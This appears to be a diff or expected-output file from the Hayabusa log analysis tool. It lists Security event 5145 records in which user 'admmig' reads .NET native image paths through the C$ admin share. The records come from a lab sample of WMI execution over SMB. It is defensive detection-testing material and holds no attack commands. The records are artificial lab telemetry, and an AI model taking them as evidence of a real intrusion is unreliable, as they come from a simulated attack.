+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
+2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
